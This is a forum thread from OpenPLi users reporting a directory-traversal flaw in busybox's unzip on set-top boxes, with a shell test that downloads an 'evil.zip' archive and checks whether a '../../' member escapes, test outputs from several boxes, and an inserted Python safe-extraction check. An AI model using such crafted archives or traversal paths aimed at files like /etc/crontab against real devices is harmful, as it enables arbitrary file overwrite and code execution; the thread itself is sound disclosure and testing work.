
Very important - security issue


27 replies to this topic

#1 samsamsam

  • Senior Member
  • 2,024 posts

+146
Excellent

Posted 25 May 2017 - 19:41

Hello,

 

Maybe someone read this article:

http://blog.checkpoi...in-translation/

 

It seems that in OpenPLi the unzip version from busybox is used.

This version of unzip does not have protection against the "Directory traversal vulnerability".

It means that it "allows to overwrite or create arbitrary files via relative filenames and thus executing malicious code, e.g. by writing to /etc/ld.so.preload, ~/.bashrc etc."

 

In the full unzip version this was fixed on 2003-07-11, in unzip-5.50-r2:

http://www.linuxsecu...iew/105186/104/

 

So, I strongly recommend disabling the unzip applet in the busybox configuration and using the full unzip utility.

 

Regards,

SSS



Re: Very important - security issue #2 WanWizard

  • PLi® Core member
  • 68,598 posts

+1,739
Excellent

Posted 25 May 2017 - 20:02

Thanks for reporting it, I'll pass it on.


Currently in use: VU+ Duo 4K (2xFBC S2), VU+ Solo 4K (1xFBC S2), uClan Usytm 4K Pro (S2+T2), Octagon SF8008 (S2+T2), Zgemma H9.2H (S2+T2)

Due to my bad health, I will not be very active at times and may be slow to respond. I will not read the forum or PM on a regular basis.

Many answers to your question can be found in our new and improved wiki.


Re: Very important - security issue #3 samsamsam

  • Senior Member
  • 2,024 posts

+146
Excellent

Posted 25 May 2017 - 20:53

No problem.

 

If someone wants to test this, then this file can be used:

http://iptvplayer.pl/temp/evil.zip -O /tmp/tmp1/tmp2/evil.zip

 

Example code demonstrating the possible problem.

# work from /tmp, with a nested directory as the extraction target
cd /tmp
mkdir -p tmp1/tmp2
# fetch the test archive; its member name starts with ../../
wget http://iptvplayer.pl/temp/evil.zip -O /tmp/tmp1/tmp2/evil.zip
# a traversal-safe unzip keeps the member under tmp2; a vulnerable one writes it to /tmp
unzip /tmp/tmp1/tmp2/evil.zip -d /tmp/tmp1/tmp2/
# this file exists only if the member escaped the extraction directory
ls -la /tmp/make_some_bad.elf
# clean up
rm -rf /tmp/tmp1

Let's think what could happen when the path of a file in the archive is, for example, ../../../../../etc/crontab etc.

We could unknowingly install a daemon which will be run by the system without our knowledge and send our private data to an attacker, or allow connections to our STB, or use our STB to attack other devices in our network.

 

Regards,

SSS


Edited by samsamsam, 25 May 2017 - 20:58.
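A defensive check for the behaviour discussed in posts #1 and #3, added here as an example rather than code from the posts or from the OpenPLi project: it constructs an archive with an escaping member like evil.zip, lists the members that would land outside the extraction directory, and refuses to extract such an archive while a clean one extracts normally. Python is used because Enigma2 and its plugins are written in Python; the archive names and contents are constructed, not the real evil.zip.

```python
import io
import os
import tempfile
import zipfile

def build_zip(members: dict) -> bytes:
    """Build an in-memory zip from {member name: content} (constructed input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, body in members.items():
            zf.writestr(name, body)
    return buf.getvalue()

# Constructed stand-ins: EVIL mimics the thread's evil.zip (one member climbs
# out of the extraction directory, one is harmless); CLEAN is all harmless.
EVIL = build_zip({"../../make_some_bad.elf": "x\n", "plugin/ok.txt": "fine\n"})
CLEAN = build_zip({"plugin/ok.txt": "fine\n"})

def unsafe_members(data: bytes, dest: str) -> list:
    """Member names that would resolve outside dest (absolute or escaping '..')."""
    root = os.path.realpath(dest)
    bad = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            target = os.path.realpath(os.path.join(root, name))
            if os.path.isabs(name) or os.path.commonpath([root, target]) != root:
                bad.append(name)
    return bad

def safe_extract(data: bytes, dest: str) -> list:
    """Refuse the whole archive if any member escapes dest; otherwise extract."""
    # Refusing, rather than silently stripping '../' as newer busybox does,
    # keeps the tampering visible to the caller instead of hiding it.
    bad = unsafe_members(data, dest)
    if bad:
        raise ValueError(f"refusing archive, traversal members: {bad}")
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        zf.extractall(dest)
        return zf.namelist()

def demo() -> tuple:
    """Run both archives against a scratch directory and report the outcome."""
    dest = tempfile.mkdtemp()
    flagged = unsafe_members(EVIL, dest)
    try:
        safe_extract(EVIL, dest)
        refused = False
    except ValueError:
        refused = True
    return flagged, refused, safe_extract(CLEAN, dest)
```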


Re: Very important - security issue #4 betacentauri

  • PLi® Core member
  • 7,185 posts

+323
Excellent

Posted 26 May 2017 - 06:24

And samba has another vulnerability:
https://m.heise.de/n...ba-3725672.html (Sorry it's in German)

Sorry, but I think we cannot fix all vulnerabilities. There are too many. Otherwise several guys would need to check security pages and build patches every day. E2 boxes are not safe. In the case of Samba, users shouldn't open ports to their boxes.

Edited by betacentauri, 26 May 2017 - 06:25.

Xtrend ET-9200, ET-8000, ET-10000, OpenPliPC on Ubuntu 12.04

Re: Very important - security issue #5 gawro

  • Senior Member
  • 45 posts

+2
Neutral

Posted 26 May 2017 - 07:38

A workaround for the samba vulnerability is to place the following line in the [global] section of the smb.conf file:

nt pipe support = no


Re: Very important - security issue #6 WanWizard

  • PLi® Core member
  • 68,598 posts

+1,739
Excellent

Posted 26 May 2017 - 11:31

Everything runs as root on the box; it is an illusion that you can secure it as you can a full-blown Linux installation.

 

Treat the box as what it is: an STB running an embedded OS, and don't turn it into anything else, just because it runs a form of Linux, and because "you can".




Re: Very important - security issue #7 MastaG

  • Senior Member
  • 1,531 posts

+118
Excellent

Posted 26 May 2017 - 14:24

Yep.. if we would like to be secure.. then we have to make some really large changes..
One of the first being that we don't run enigma2 (and other daemons such as softcams) as root but as a dedicated user which can access the hardware (e.g. by being a member of the video group or something).

While we're at it, we might as well switch to systemd :P

Secondly.. we would need to upgrade our oe-snapshot on a weekly basis (breaking the shit out of everything).. and hope the oe maintainers care about getting the latest CVE patches in asap. (or have a security officer here, taking care of it :P).



Re: Very important - security issue #8 MiLo

  • PLi® Core member
  • 14,045 posts

+298
Excellent

Posted 27 May 2017 - 08:21

It seems that in OpenPLi the unzip version from busybox is used.
This version of unzip does not have protection against the "Directory traversal vulnerability".


Have you tested this on OpenPLi, and if so, what was the result?

And, while you're at it, there's probably a CVE for busybox to fix it, if it applies to "our" busybox. Did you find that?

Real musicians never die - they just decompose

Re: Very important - security issue #9 janejak

  • Senior Member
  • 284 posts

+11
Neutral

Posted 27 May 2017 - 10:04

No problem.

 

If someone wants to test this, then this file can be used:

http://iptvplayer.pl/temp/evil.zip -O /tmp/tmp1/tmp2/evil.zip

 

Example code demonstrating the possible problem.

# work from /tmp, with a nested directory as the extraction target
cd /tmp
mkdir -p tmp1/tmp2
# fetch the test archive; its member name starts with ../../
wget http://iptvplayer.pl/temp/evil.zip -O /tmp/tmp1/tmp2/evil.zip
# a traversal-safe unzip keeps the member under tmp2; a vulnerable one writes it to /tmp
unzip /tmp/tmp1/tmp2/evil.zip -d /tmp/tmp1/tmp2/
# this file exists only if the member escaped the extraction directory
ls -la /tmp/make_some_bad.elf
# clean up
rm -rf /tmp/tmp1

Let's think what could happen when the path of a file in the archive is, for example, ../../../../../etc/crontab etc.

We could unknowingly install a daemon which will be run by the system without our knowledge and send our private data to an attacker, or allow connections to our STB, or use our STB to attack other devices in our network.

 

Regards,

SSS

 

tested on my dm900uhd

 

root@dm900:~$ cd /tmp
root@dm900:/tmp$ mkdir -p tmp1/tmp2
root@dm900:/tmp$ wget http://iptvplayer.pl/temp/evil.zip -O /tmp/tmp1/tmp2/evil.zip
Connecting to iptvplayer.pl (87.98.239.40:80)
evil.zip             100% |*******************************|   150   0:00:00 ETA
root@dm900:/tmp$ unzip  /tmp/tmp1/tmp2/evil.zip -d /tmp/tmp1/tmp2/
Archive:  /tmp/tmp1/tmp2/evil.zip
unzip: removing leading '../../' from member names
  inflating: make_some_bad.elf
root@dm900:/tmp$ ls -la /tmp/make_some_bad.elf
ls: /tmp/make_some_bad.elf: No such file or directory
root@dm900:/tmp$ rm -rf /tmp/tmp1



Re: Very important - security issue #10 littlesat

  • PLi® Core member
  • 56,272 posts

+691
Excellent

Posted 27 May 2017 - 11:50

OpenPli on dmm900... nope!?

WaveFrontier 28.2E | 23.5E | 19.2E | 16E | 13E | 10/9E | 7E | 5E | 1W | 4/5W | 15W


Re: Very important - security issue #11 MiLo

  • PLi® Core member
  • 14,045 posts

+298
Excellent

Posted 28 May 2017 - 14:07

tested on my dm900uhd
 
root@dm900:~$ cd /tmp
root@dm900:/tmp$ mkdir -p tmp1/tmp2
root@dm900:/tmp$ wget http://iptvplayer.pl/temp/evil.zip -O /tmp/tmp1/tmp2/evil.zip
Connecting to iptvplayer.pl (87.98.239.40:80)
evil.zip             100% |*******************************|   150   0:00:00 ETA
root@dm900:/tmp$ unzip  /tmp/tmp1/tmp2/evil.zip -d /tmp/tmp1/tmp2/
Archive:  /tmp/tmp1/tmp2/evil.zip
unzip: removing leading '../../' from member names
  inflating: make_some_bad.elf
root@dm900:/tmp$ ls -la /tmp/make_some_bad.elf
ls: /tmp/make_some_bad.elf: No such file or directory
root@dm900:/tmp$ rm -rf /tmp/tmp1


If there were such thing as OpenPLi for dm900, this would only demonstrate that the box is NOT vulnerable.

Re: Very important - security issue #12 samsamsam

  • Senior Member
  • 2,024 posts

+146
Excellent

Posted 28 May 2017 - 16:37

@MiLo

 

No. I am not using OpenPLI at all.

Did you read my post?

 


It seems that in OpenPLi the unzip version from busybox is used.

This version of unzip does not have protection against the "Directory traversal vulnerability".



Re: Very important - security issue #13 WanWizard

  • PLi® Core member
  • 68,598 posts

+1,739
Excellent

Posted 28 May 2017 - 16:49

I don't think MiLo said that.

 

He just replied to "janjak" that the output shows that the box is not vulnerable, and if that is OpenPLi code, it implies that OpenPLi isn't vulnerable either...

 

Where is the error in that?




Re: Very important - security issue #14 ims

  • PLi® Core member
  • 13,624 posts

+212
Excellent

Posted 28 May 2017 - 17:10

Will there be oe5 only for xp1000? With the bonus of a +36% increased image size for such a weak single core box?


He who does nothing spoils nothing!

Re: Very important - security issue #15 WanWizard

  • PLi® Core member
  • 68,598 posts

+1,739
Excellent

Posted 28 May 2017 - 17:40

Wrong topic?




Re: Very important - security issue #16 ims

  • PLi® Core member
  • 13,624 posts

+212
Excellent

Posted 28 May 2017 - 18:30

yes ... sorry ..., move it to oe5, please


Edited by ims, 28 May 2017 - 18:30.


Re: Very important - security issue #17 samsamsam

  • Senior Member
  • 2,024 posts

+146
Excellent

Posted 28 May 2017 - 19:19

I don't think MiLo said that.

 

He just replied to "janjak" that the output shows that the box is not vulnerable, and if that is OpenPLi code, it implies that OpenPLi isn't vulnerable either...

 

Where is the error in that?

 

Did you read my post or not?

Do you use the unzip applet from busybox, or maybe the full version of the unzip utility?

Everything is in my post. Just read it. Or if you're not interested, don't read it.

 

From my point of view further discussion does not make sense. Posts by core members like @MastaG, @WanWizard give me my answer about competence.

Phrases like:

 


Everything runs as root on the box, it is an illusion that you can secure

 

 

I do not know what you do in your professional life, but I hope you pay more attention to your tasks.

 

Regards,

SSS


Edited by samsamsam, 28 May 2017 - 19:20.


Re: Very important - security issue #18 WanWizard

  • PLi® Core member
  • 68,598 posts

+1,739
Excellent

Posted 28 May 2017 - 19:28

I don't care what you wrote or didn't write. The comment wasn't about that. The comment was that the output of janjak's specific example showed his installation was not vulnerable. It used your own zip file to show that.

 

Nothing more, nothing less.

 

You desperately need to do something about these meter long toes of yours, since everybody seems to constantly stand on them. Or you think they do, even if they make a remark that isn't related to you at all, like MiLo a few posts back.




Re: Very important - security issue #19 athoik

  • PLi® Core member
  • 8,458 posts

+327
Excellent

Posted 28 May 2017 - 19:29

OpenPLi 4 has the problem.

Connected to xpeedc.
Escape character is '^]'.

openpli 4 xpeedc


xpeedc login: root
root@xpeedc:~# cd /tmp; mkdir -p tmp1/tmp2; wget http://iptvplayer.pl/temp/evil.zip -O /tmp/tmp1/tmp2/evil.zip; unzip  /tmp/tmp1/tmp2/evil.zip -d /tmp/tmp1/tmp2/; ls -la /tmp/make_some_bad.elf; rm -rf /tmp/tmp1;
Connecting to iptvplayer.pl (87.98.239.40:80)
evil.zip             100% |***********|   150   0:00:00 ETA
Archive:  /tmp/tmp1/tmp2/evil.zip
  inflating: ../../make_some_bad.elf
-rw-r--r--    1 root     root             6 May 28 21:28 /tmp/make_some_bad.elf
root@xpeedc:/var/volatile/tmp#
 

Wavefield T90: 0.8W - 1.9E - 4.8E - 13E - 16E - 19.2E - 23.5E - 26E - 33E - 39E - 42E - 45E on EMP Centauri DiseqC 16/1
Unamed: 13E Quattro - 9E Quattro on IKUSI MS-0916

Re: Very important - security issue #20 blzr

  • PLi® Core member
  • 2,269 posts

+118
Excellent

Posted 28 May 2017 - 19:32

FYI

yesterday I tested this on a vs1500 running 'regular' openpli5 (develop branch), which uses busybox's unzip, and can only confirm that it is NOT vulnerable to this threat

Edited by blzr, 28 May 2017 - 19:36.

True sarcasm doesn't need green font...

